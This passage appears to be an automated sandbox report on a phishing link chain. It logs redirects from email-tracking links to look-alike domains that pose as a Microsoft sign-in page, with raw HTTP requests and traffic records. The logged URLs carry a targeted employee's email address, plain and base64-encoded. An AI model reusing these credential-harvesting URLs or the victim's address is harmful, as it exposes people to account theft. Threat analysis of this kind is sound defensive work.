3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No favicon
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No favicon
Source: https://outlook.office365.com/owa/prefetch.aspx	HTTP Parser: No favicon

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r	HTTP Parser: No <meta name="author".. found
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r	HTTP Parser: No <meta name="author".. found
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r	HTTP Parser: No <meta name="author".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fwebnnicuttnortheastusa.com%2fcommon%2freprocess%3fctx%3drQQIARAAjZE7bNNgFIX9x6lpS6FRWdiACCRUcPxOnKBKJE7T5tW8VIiLquD4kTiJ_bu286yyMLEgCiOIgYcYOkEnxATq1qkjlAWJpepQQaeOJGJhgzOce6Sre4fzzaNUgIpcJf-IxseOk5pG4bI6Tn_Jnpv2_Th5_VW5sv7lVuD6cFcQj7fBpbrrWk6EIGDbbUHYDEBN02U1IEODgF2J-ADAPgCHADz1XGtJXVs1R0vNlkbjtixVdVN1u9BuOjUbtq3x1bYnFGR4juV4mgmRLMmFSZYKyHyIZaigijMUreIsR2k4z_IhXGI1UqG0YJWmmQPPbC7aduv02KCtD9QTz5QGbaNiQcd9hj4HcdGNxZ1kbTEaizF4uqjAxQQF8720KOp3lpKZmNFhO_WewTVKcrYsqmZUlOuWPjBqXWnVhbGa3RT6ulEo9Ck3kdjYSK_Ek6loIyWIfMpsZNaKJXOlR7qDUDmIV5nyCqctp7lq3e3YiliweiW-ny3Xc0K5nMsUJcatUNRaxeybq5UCv43-F4QdFBt1ZEBzD8WgpZq6su8F373gyDtDopHJyWkfchG5jJx6wauJEa_O8ur9b48fCI_eX9jN_1pC9iYISg2V6govJmyim8kWc-12XlcZVgyHlgotsZ8ULYMoCfJgkc4ucBFqCwNbGPYRm5pEfYgfFfLUIQZ-YuDhGeTj1L_g758FBzPsNCa3JN1w5uY3_bpScWFTNf2RTX_PcCqyPE4dqdVWHX_knn_0378-HA4_nUNOzz95-eLtzuc3x8tHszd1vZgh6VhayHSYGm8yhGLdWGPvOp0wy8tM2qg25GB3I06kwvLCOx_yGw2&mkt=en-US&hosted=0&device_platform=Windows+10	HTTP Parser: No <meta name="author".. found

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No <meta name="copyright".. found
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No <meta name="copyright".. found
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No <meta name="copyright".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fwebnnicuttnortheastusa.com%2fcommon%2freprocess%3fctx%3drQQIARAAjZE7bNNgFIX9x6lpS6FRWdiACCRUcPxOnKBKJE7T5tW8VIiLquD4kTiJ_bu286yyMLEgCiOIgYcYOkEnxATq1qkjlAWJpepQQaeOJGJhgzOce6Sre4fzzaNUgIpcJf-IxseOk5pG4bI6Tn_Jnpv2_Th5_VW5sv7lVuD6cFcQj7fBpbrrWk6EIGDbbUHYDEBN02U1IEODgF2J-ADAPgCHADz1XGtJXVs1R0vNlkbjtixVdVN1u9BuOjUbtq3x1bYnFGR4juV4mgmRLMmFSZYKyHyIZaigijMUreIsR2k4z_IhXGI1UqG0YJWmmQPPbC7aduv02KCtD9QTz5QGbaNiQcd9hj4HcdGNxZ1kbTEaizF4uqjAxQQF8720KOp3lpKZmNFhO_WewTVKcrYsqmZUlOuWPjBqXWnVhbGa3RT6ulEo9Ck3kdjYSK_Ek6loIyWIfMpsZNaKJXOlR7qDUDmIV5nyCqctp7lq3e3YiliweiW-ny3Xc0K5nMsUJcatUNRaxeybq5UCv43-F4QdFBt1ZEBzD8WgpZq6su8F373gyDtDopHJyWkfchG5jJx6wauJEa_O8ur9b48fCI_eX9jN_1pC9iYISg2V6govJmyim8kWc-12XlcZVgyHlgotsZ8ULYMoCfJgkc4ucBFqCwNbGPYRm5pEfYgfFfLUIQZ-YuDhGeTj1L_g758FBzPsNCa3JN1w5uY3_bpScWFTNf2RTX_PcCqyPE4dqdVWHX_knn_0378-HA4_nUNOzz95-eLtzuc3x8tHszd1vZgh6VhayHSYGm8yhGLdWGPvOp0wy8tM2qg25GB3I06kwvLCOx_yGw2&mkt=en-US&hosted=0&device_platform=Windows+10	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: 5rve2bms.r.eu-west-1.awstrack.me to https://m.exactag.com/ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2fwinner%2f54799%2f%2fbgf3cmvuy2uuznjhbmnlqgnhymluzxr3b3jrc2dyb3vwlmnvbq==
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: venicuttnortheastusa.com to https://webnnicuttnortheastusa.com/?dataxx0=eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyj1cmwioijodhrwczovl3dlym5uawn1dhrub3j0agvhc3r1c2euy29tlyisimrvbwfpbii6indlym5uawn1dhrub3j0agvhc3r1c2euy29tiiwia2v5ijoitm1ycdj4tm9uy3jbiiwicxjjijoibgf3cmvuy2uuznjhbmnlqgnhymluzxr3b3jrc2dyb3vwlmnvbsisimlhdci6mtcxodk4ntu3nywizxhwijoxnze4otg1njk3fq.hykxsshff_m4uv6xa1brzjwnq3cfmkas4wo7ldtvrym

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379 HTTP/1.1Host: 5rve2bms.r.eu-west-1.awstrack.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2Fwinner%2F54799%2F%2FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== HTTP/1.1Host: m.exactag.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?lbkwmykb&qrc=lawrence.france@cabinetworksgroup.com HTTP/1.1Host: venicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://kenfong.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com HTTP/1.1Host: venicuttnortheastusa.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: http://kenfong.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/c7e29c8c8b6e/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
